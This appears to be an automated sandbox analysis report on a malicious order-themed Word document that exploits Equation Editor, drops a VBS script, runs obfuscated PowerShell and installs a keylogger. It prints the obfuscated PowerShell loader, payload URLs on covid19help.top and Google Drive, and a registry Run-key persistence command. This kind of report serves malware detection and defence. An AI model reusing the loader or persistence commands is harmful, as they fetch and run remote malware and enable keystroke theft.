Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 0000000F.00000002.562554109.0000000020E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbs
Source: EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbsj
Source: EQNEDT32.EXE, 00000002.00000002.348699576.000000000060F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Transfusionist.vbsssC:
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/ch
Source: powershell.exe, 00000007.00000002.476890529.000000000257E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000007.00000002.483917917.0000000004FC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.476890529.000000000257E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436497119.000000000257E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3
Source: wab.exe, 0000000F.00000002.551423696.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-
Source: powershell.exe, 00000007.00000002.476890529.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000007.00000002.476890529.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download
Source: wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000007.00000002.476890529.0000000002703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49183 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Drops certificate files (DER)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: COACH APRIL ORDER.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3752, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing") from the yellow bar aboveASSIGNMENTMCS 473: MARKETING MANAGEMENT & STRATEGYSTUDENT

Potential malicious VBS script found (suspicious strings)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Dropped file: Nostalgiske.ShellExecute Subjectiveness,Skiffs,"","" ,Undersiders			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Dropped file: Nostalgiske.ShellExecute Subjectiveness,Skiffs,"","" ,Undersiders			Jump to dropped file

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 6874	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6874

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 22_2_07DE0464 NtResumeThread,

22_2_07DE0464

Detected potential crypto function

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062A50F	2_2_0062A50F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00629816	2_2_00629816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E8718	7_2_002E8718
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E8FE8	7_2_002E8FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_002E83D0	7_2_002E83D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20214960	15_2_20214960
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20213940	15_2_20213940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20219250	15_2_20219250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20213C88	15_2_20213C88
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2021C4D0	15_2_2021C4D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20350040	15_2_20350040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20356D98	15_2_20356D98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_203589DD	15_2_203589DD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20355E29	15_2_20355E29
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20358FC8	15_2_20358FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20357630	15_2_20357630
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20352270	15_2_20352270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20359738	15_2_20359738
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2021C880	15_2_2021C880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C7AF8	22_2_001C7AF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C83C8	22_2_001C83C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001C77B0	22_2_001C77B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0601	22_2_07DE0601
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDFE2D	22_2_07DDFE2D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0905	22_2_07DE0905
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC2959F	30_2_1FC2959F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC23940	30_2_1FC23940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC24958	30_2_1FC24958
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC24088	30_2_1FC24088
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC2C84B	30_2_1FC2C84B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC66231	30_2_1FC66231
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC671A0	30_2_1FC671A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC60040	30_2_1FC60040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC693D0	30_2_1FC693D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 30_2_1FC62678	30_2_1FC62678
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E4088	34_2_049E4088
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E4958	34_2_049E4958
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E3940	34_2_049E3940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049E92C3	34_2_049E92C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_049ED090	34_2_049ED090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20060040	34_2_20060040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20067198	34_2_20067198
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20066231	34_2_20066231
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_20062270	34_2_20062270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 34_2_200693C8	34_2_200693C8

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"

Yara signature match

Source: COACH APRIL ORDER.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3752, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@36/36@77/7

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ACH APRIL ORDER.doc

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6585.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......8I.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......DI.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......VI.........................s....................~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......bI.........................s............H...............................
